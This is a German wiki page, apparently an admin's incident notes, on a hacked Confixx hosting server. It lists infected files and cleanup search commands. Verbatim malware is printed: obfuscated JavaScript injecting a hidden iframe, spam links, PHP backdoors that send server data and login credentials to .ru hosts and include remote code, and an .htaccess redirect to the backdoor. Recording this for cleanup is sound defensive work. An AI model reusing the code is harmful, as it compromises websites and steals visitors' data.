Hacked Confixx
Ago (Diskussion | Beiträge) |
Ago (Diskussion | Beiträge) |
||
| Zeile 3: | Zeile 3: | ||
grep for new files: | grep for new files: | ||
| − | cat new_files.log | grep -v 'png$' | grep -v 'gif$' | grep -v 'jpg$' | grep -v 'bmp$ | + | cat new_files.log | grep -v 'png$' | grep -v 'gif$' | grep -v 'jpg$' | grep -v 'bmp$' | sed ':a;N;$!ba;s/\n/ /g' |
---- | ---- | ||
Version vom 10. September 2015, 14:17 Uhr
Hacked Confixx
grep for new files:
cat new_files.log | grep -v 'png$' | grep -v 'gif$' | grep -v 'jpg$' | grep -v 'bmp$' | sed ':a;N;$!ba;s/\n/ /g'
login-6.hoststar.ch:
some informations: http://lukewelling.com/category/spyware/
/home/www/confixx/html/webapps/zencart/index.de.html:
/home/www/confixx/html/webapps/xrms/index.de.html:
/home/www/confixx/html/webapps/xoops/index.de.html:
/home/www/confixx/html/webapps/xaraya/index.de.html:
/home/www/confixx/html/webapps/weberp/index.de.html:
/home/www/confixx/html/webapps/wbbook/index.de.html:
/home/www/confixx/html/webapps/vstat/index.de.html:
... haben aber anderen code vorhanden ...
<script language="javascript" type="text/javascript">var k='?gly#vw|oh@%ylvlelolw|=#klgghq>#srvlwlrq=#devroxwh>#ohiw=#4>#wrs=#4%A?liudph#vuf@%kwws=22xvhu4<1liudph1ux2Bv@4%#iudpherughu@3#yvsdfh@3#kvsdfh@3#zlgwk@4#khljkw@4#pdujlqzlgwk@3#pdujlqkhljkw@3#vfuroolqj@qrA?2liudphA?2glyA',t=0,h='';while(t<=k.length-1){h=h+String.fromCharCode(k.charCodeAt(t++)-3);}document.write(h);</script>
<div style="visibility: hidden; position: absolute; left: 1; top: 1">iframe src="http://user19.iframe.ru/?s=1" fraborder=0 vspace=0 hspace=0 width=1 height=1 marginwidth=0 marginheight=0 scrolling=no></iframe></div>
Search for "</p><a href=.*</a>" of for class=giepoaytr
you can use follow list to find some of them: http://www.maxispecialisten.se/punbb-1.2.7/sess31002/lk.txt http://www.afdex.com/common/board/data/Automatic_Multi_Stage_Cold_Forging/sess31002/lk.txt
/home/www/confixx/html/webapps/weberp/index.de.html:
<a href="http://gallery.ransomed.us/albums/album06/SMS-%2BSamsung%2BSGH-S500.shtml" class=giepoaytr title="SMS- Samsung SGH-S500" target=_blank>SMS- Samsung SGH-S500</a>
/home/www/confixx/html/webapps/wbbook/index.de.html:
<a href="http://www.woltlab.de/products/burning_book/demo/">http://www.woltlab.de/products/burning_book/demo/</a> <a href="http://www.flyfic.renaissance-ghost.net/stories/graphospasm/images/no%2Bcd%2Bcrack%2Btonka.jsp" class=giepoaytr title="no cd crack tonka">no cd crack tonka</a>
/home/www/confixx/html/webapps/vstat/index.de.html:
<a href="http://www.geraldlee.net/nm/jak%2Bm%2Bmio%2Bpl.phtml" class=giepoaytr target=_blank>jak m mio pl</a>
/home/www/confixx/html/webapps/typo/index.de.html:
<a href="http://www.konline.org/alber/gallery/albums/album02/Underground2-Crack.jsp" class=giepoaytr>Underground2-Crack</a>
/home/www/confixx/html/webapps/tsep/index.de.html:
<a href="http://www.squarefc.com/gallery/content/Mascot/diablo%202%20downlaod.phtml" class=giepoaytr>diablo 2 downlaod</a>
/home/www/confixx/html/webapps/topdownloads/index.de.html:
<a href="http://www.artmotion.between-worlds.net/iB_html/non-cgi/Skin/SKIN-2/grifin-barbie.html" class=giepoaytr title="grifin barbie">grifin barbie</a>
/home/www/confixx/html/webapps/template/index.de.html:
<a href="http://www.rockpoppyprincess.pinkgraffiti.com/cart/images/couter.strike1.6.dowload.shtml" class=giepoaytr>couter strike1.6 dowload</a>
/home/www/confixx/html/webapps/squirrelmail/index.de.html:
<a href="http://mkweb.mattkennedy.us/modules/news/images/topics/Warcraft_MAPHACK_v_1.20.shtml" class=giepoaytr>Warcraft MAPHACK v 1.20</a>
/home/www/confixx/html/webapps/zencart/guest.php:
/home/www/confixx/html/webapps/xrms/configs.php:
/home/www/confixx/html/webapps/xoops/include.php:
/home/www/confixx/html/webapps/xaraya/date.php:
<? error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s"; if ((include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjkubXNodG1sLnJ1")."/?".$str))){} else {include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcuaHRtbHRhZ3MucnU=")."/?".$str);} ?>
open data from "user7.htmltags.ru"
/home/www/confixx/html/webapps/zencart/create.php:
/home/www/confixx/html/webapps/xrms/messages.php:
/home/www/confixx/html/webapps/xoops/includes.php:
/home/www/confixx/html/webapps/xaraya/report.php:
<?php error_reporting(0); if(isset($_POST["l"]) and isset($_POST["p"])){ if(isset($_POST["input"])){$user_auth="&l=". base64_encode($_POST["l"]) ."&p=". base64_encode(md5($_POST["p"]));} else{$user_auth="&l=". $_POST["l"] ."&p=". $_POST["p"];} }else{$user_auth="";} if(!isset($_POST["log_flg"])){$log_flg="&log";} if(! @include_once(base64_decode("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9") . sprintf("%u", ip2long(getenv(REMOTE_ADDR))) ."&url=". base64_encode($_SERVER["SERVER_NAME"] . $_SERVER[REQUEST_URI]) . $user_auth . $log_flg)) { if($_POST["l"]=="special"){print "sys_active". `uname -a`;} } ?>
open data from "http://bis.iframe.ru/master.php?r_addr="
/home/www/confixx/html/webapps/zencart/.htaccess:
/home/www/confixx/html/webapps/xrms/.htaccess:
/home/www/confixx/html/webapps/xoops/.htaccess:
/home/www/confixx/html/webapps/xaraya/.htaccess:
Options -MultiViews ErrorDocument 404 //webapps/zencart/guest.php
allways force an 404 error and redirect to malware file
